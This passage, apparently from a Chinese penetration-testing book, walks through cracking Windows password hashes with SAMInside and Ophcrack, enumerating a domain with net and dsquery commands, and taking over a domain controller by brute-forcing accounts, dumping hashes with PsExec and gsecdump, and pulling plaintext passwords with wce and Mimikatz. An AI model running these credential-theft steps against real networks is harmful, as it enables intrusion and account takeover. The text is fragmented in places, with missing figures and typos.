图1-18 导出系统用户的Hash值 SAMInside本身也能破解系统Hash值,不过破解速度和效果不如Ophcrack。对一些简单的密码,SAMInside会直接显示,感兴趣的朋友可以尝试。 1.5.5 设置SAMInside的破解方式 如图1-19所示,默认选择“LM-hashes attack”选项进行破解。如果用户密码超过14位,或者LM-hash中显示的全是0,则可以选择“NT-hashes attack”选项进行破解。然后,需要设置字典破解、暴力破解、掩码破解及彩虹表破解等。 如果采用字典破解,则需要选择“Options…”选项,在“Dictionary attack”中设置字典。将本地字典文件添加到字典文件列表中,如图1-20所示。可以设置多个字典文件用于破解。SAMInside的帮助系统提供了在线字典下载功能,大概有2GB的字典可供下载。 图1-19 设置SAMInside的破解方式 图1-20 导入字典文件进行破解 1.5.6 执行破解 设置破解的有关选项后,单击绿色三角形图标进行破解,如图1-21所示。如果密码在字典文件中,则很快就会给出结果。 图1-21 运行字典破解本地用户密码
未知 1.6 Windows Server 2003域控服务器用户账号和密码的获取 域控制器相当于一个门卫,其中包含由这个域的账户密码、管理策略等信息构成的数据库。 当一台计算机登录域时,域控制器要鉴别这台计算机是否属于这个域,以及用户使用的登录账号和密码是否正确。 如果正确,则允许计算机登录这个域,使用该域内其有权限访问的资源,如文件服务器、打印服务器(也就是说,域控制器仅起到验证作用,访问其他资源并不需要再跟域控制器扯上关系); 如果不正确,则不允许计算机登录,这时计算机将无法访问域内的资源,这在一定程度上保护了企业网络资源。 域服务器的作用如下。
ISA、Exchange、防病毒服务器、补丁分发服务器、文件服务器等服务依赖于域服务器。 域控服务器是网络安全渗透的重点对象。 获取了域控服务器的权限,就意味着掌控了整个网络的资源和权限,在渗透过程中获取域控服务器用户账号和密码是基础和必需的一步。 本节将对域控渗透思路、内网渗透常见命令及域控用户账号和密码的获取进行探讨。 1.6.1 域控服务器渗透思路 域控服务器的渗透思路,仁者见仁,智者见智,笔者将实际工作经验总结如下。 寻找网络入口,获取域控用户权限,通过用户获取域控管理员信息。 针对域控管理员开展个人主机渗透或者社会工程学攻击,获取域管理员个人主机权限,进而获取域控服务器权限。 获取域控服务器内某台Web服务器或者其他服务器的权限。 在获取一台服务器的权限后,通过获取该服务器的用户账号和密码,对整个内网使用NTScan等工具进行账号的暴力破解,从而获取域控服务器权限。 总之,在内网渗透中需要对各种信息进行收集和研判,通过信息进行大胆的推断和渗透测试,不断扩大权限,最终获取域控服务器的权限。 1.6.2 内网域控服务器渗透的常见命令 下面介绍内网域控服务器渗透的常见命令。
端口列表:开放端口对应的常见服务/应用程序(匿名、权限、漏洞等),以及利用端口进行信息收集,建议读者深入挖掘(NETBIOS、SMB等)。
2.常见的信息收集命令 查询本机用户列表:net user 查询本机管理员(通常含有域用户):net localhroup administrators 查询域管理员用户:net group "domain admins" /domain 查询域用户:net user /domain 查询域里面的工作组:net group /domain 查询域名称:net view /domain 查询域内计算机:net view /domain:XX 查询域控制器:net time /domain 查询域管理员用户组:net localgroup administrators /domain 域用户添加到本机:net localgroup administrators workgroup\user001 /add 查看域控制器(如果有多台):net group "Domain controllers" 查询本机IP段、所在域等:ipconfig /all 查询同一域内机器列表:net view 查询所有域控制器:dsquery server dsquery server -domain super.com | dsget server -dnsname -site //搜索域内所有域控制器并显示其DNS主机名和站点名 查询域内计算机:dsquery computer dsquery computer domainroot -name admin* -limit 10 //搜索域内名称以“admin”开头的前10台机器 查询域用户:dsquery user dsquery user domainroot -name admin* -limit 10 //搜索域内名称以“admin”开头的前10个用户 查询域内联系人:dsquery contact dsquery contact domainroot -name admin* -limit 10 //搜索域内名称以“admin”开头的前10个联系人 查询域内子网:dsquery subnet 查询域内用户组:dsquery group dsquery group dc=super,dc=com |more //搜索在DC=SUPER、DC=COM域中的所有组 查询域内组织单位:dsquery ou 查询域内站点:dsquery site dsquery site -o rdn //搜索域中所有站点的名称 查询域内所有计算机:net group "domain computers" /domain 注意 -limit参数不指定查询数量,则默认显示前100条结果。 查询超过4周未登录的计算机:dsquery computer -inactive 4 查询超过4周未登录的用户:dsquery user -inactive 4 通过组织单位查询计算机:dsquery computer "ou=xx,dc=xx,dc=com" 求助待解决问题: dsquery user domainroot -name admin* -limit 10 //搜索域内名称以“admin”开头的前10个用户 查询这10个用户的后10个用户要如何写? 列出本机所有驱动器:fsutil.exe fsinfo drives 显示当前路由表中的所有项目:route print 显示IP路由表中以“10”开头的路由条目:route print 10.* 备份导出服务器网络配置:netsh dump>d:\netbak.txt 查看邮件服务器记录:nslookup -qt=mx google.com 查看子域名服务器记录:nslookup -qt=ns google.com 列出所有记录:>ls -d domain d:\xxx.txt 1.6.3 域控服务器用户账号和密码获取实例 01 获取IP配置信息 打开命令提示符窗口,如图1-22所示,输入命令“ipconfig /all”,查看该服务器的IP地址等信息,并通过该信息探测是否存在域控服务器。
图1-22 获取网络配置情况 02 查看域控情况 通过“net view”命令查看显示当前域的计算机列表,在本例中发现仅存在1台服务器,如图1-23所示。 运行“net view”命令可以显示域列表、计算机列表或指定计算机的共享资源列表。 “net view [\\ComputerName] [/domain[:DomainName]]”命令用于指定要查看其可用计算机的域。
图1-23 显示当前域的计算机列表 图1-24 获取当前域控名称 03 登录域控服务器 使用NTScan扫描网段10.168.10.1-254中已经获取的Web服务器管理员密码和用户密码,获取IP地址为10.168.10.3的域控服务器的用户名和密码。
04 获取域控服务器的用户密码 将PsExec、gsecdump等工具上传到域控服务器。 执行“psexec \\127.0.0.1 cmd”命令获取system权限,然后到工具目录下执行“gsecdump -s >all.txt”命令,将用户密码Hash值全部导出到all.txt文件,如图1-26所示,代码如下。 图1-25 获取域控服务器权限 图1-26 获取域控服务器的用户密码 usage: gsecdump [options] options: -a [ --dump_all ] dump all secrets -s [ --dump_hashes ] dump hashes from SAM/AD -l [ --dump_lsa ] dump lsa secrets -u [ --dump_usedhashes ] dump hashes from active logon sessions -w [ --dump_wireless ] dump microsoft wireless connections -h [ --help ] show help -S [ --system ] run as localsystem 05 查看并整理域控用户密码 通过“记事本”等程序打开all.txt,将IUSR、IWAM及用户名末尾含有“$”符号的用户全部删除。
例如,“IUSR_FS02T47E(current)”、“IWAM_FS02T47E(current)”、“RM103-2$(current)”都是无用的密码,如图1-27所示。
图1-27 查看并整理域控用户密码 06 破解域控用户密码 将整理好的文件导入Ophcrack中进行破解。 如图1-28所示,可以快速破解域控用户的密码。 图1-28 破解域控用户的密码 技巧 有些情况下,由于管理员设置了超过14位的密码,所以通过gsecdump获取的Hash值也无法通过Ophcrace工具进行破解。
执行“wce -w”命令直接获取登录用户的明文密码,如图129所示。 图1-29 获取登录用户的明文密码 还可以使用Mimikatz获取系统曾经登录用户的明文密码,示例如下。
工具下载:http://sourceforge.net/project/showfiles.php?group_id=133599 Ophcrack主页:http://ophcrack.sourceforge.net/ 英文维基百中关于彩虹表的定义和解释:http://en.wikipedia.org/wiki/Rainbow_table 国内对彩虹表的研究:http://www.antsight.com/zsl/rainbowcrack/ 目前有关Ophcrack和彩虹表的其他相关资料 下载Ophcrack软件及其源代码,以及Ophcrack提供的彩虹表(http://ophcrack. sourceforge.net/tables.php),可以知道Ophcrack提供了3个免费的彩虹表和1个需付费购买的Windows XP Special扩展表。
1.Windows XP free small(380MB) 标识: SSTIC04-10k 破解成功率: 99.9% 字母数字表: 123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ 该表由大小写字母和数字生成,大小为388MB,包含所有字母数字混合密码中99.9% 的LanManager表。
由于LanManager Hash表将密码分成每份7个字符的2段,所以,可以用该表破解长度为1~14位的密码。 由于LanManager Hash表是不区分大小写的,该表中的800亿个组合就相当于12×1011(或者283)个密码,因此也被称为“字母数字表10K”。
2.Windows XP free fast(703MB) 标识: SSTIC04-5k 成功率: 99.9% 字母数字表: 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ字母数字表5KB,大小为703MB,包含所有字母数字组合的密码中99.9% 的LanManager表。
3.Windows XP Special(7.5GB) 标识: WS-20k 成功率: 96% Windows XP Special扩展表的大小为7.5GB,包含最长14个大小写字母、数字及33个特殊字符(“!”、“"”、“#”、“$”、“%”、“&”、“'”、“(”、“)”、“*”、“+”、“,”、“-”、“.”、“/”、“:”、“;”、“<”、“=”、“>”、“?”、“@”、“[”、“\”、“]”、“^”、“”、“`”、“{”、_“|”、“}”、“~”和空格)组成的密码中96%的LanManager表。
笔者在安装过程中选择后下载了数个小时,而实际上,彩虹表可以在程序安装完成后再下载,否则要等彩虹表下载完成后才能使用Ophcrack。 图1-31 安装时建议不下载彩虹表 02 使用Ophcrack 运行Ophcrack,该软件有“Load”、“Delete”、“Save”、“Tables”、“Crack”、“Help”、“Exit”共7个主要模块,如图1-32所示。
本例将3个压缩文件解压到F盘,如图1-34所示,选择“Tables”目录,即可同时安装获取的其他2个彩虹表。 图1-32 Ophcrack主界面 图1-33 彩虹表 图1-34 选择要安装的彩虹表 注意 (1)在Ophcrack中,其彩虹表的上级目录名称必须为“tables”,否则彩虹表无法成功安装。 (2)彩虹表安装成功后,其条目图标会变成绿色,用户还可以查看彩虹表的数量,如图1-35所示。 图1-35 彩虹表安装成功 05 准备破解材料 这里的破解材料主要是指通过GetHashes、Pwdump等软件获取的系统Hash密码值。
如图1-36所示,一共有6个选项,第1个选项主要用于对单个Hash的破解,第2个选项用于对获取的Pwdump文件进行破解,第3个选项用于对加密的SAM文件进行破解,第4个和第5个选项主要用于审计或者破解本地和远程Hash密码。
在本例中,“IUSR_XFFZD-R1”、“TWWM_XFZD-SER1”和“TsInternetUser”这3个用户是系统自带的,在口令破解中基本没有用处(除非有人对该账号进行了克隆)。
单击“Crack”按钮开始破解,很快就得出密码“www119”,其“LM Pwd1”值与“NT pwd”相同,破解密码的时间仅为37秒,如图1-39所示。
图1-40 查看所破解密码的有关统计信息 ⑥ 破解参数设置。 单击“Preferences”选项卡,打开破解参数设置窗口,如图1-41所示,可以设置破解的线程、破解方式及是否隐藏用户名等。 图1-41 设置破解参数 1.7.3 彩虹表破解密码防范策略 通过彩虹表破解密码使入侵者可以很方便地获取系统的口令,从而“正常”登录系统,让管理员或者计算机的主人不太容易发现。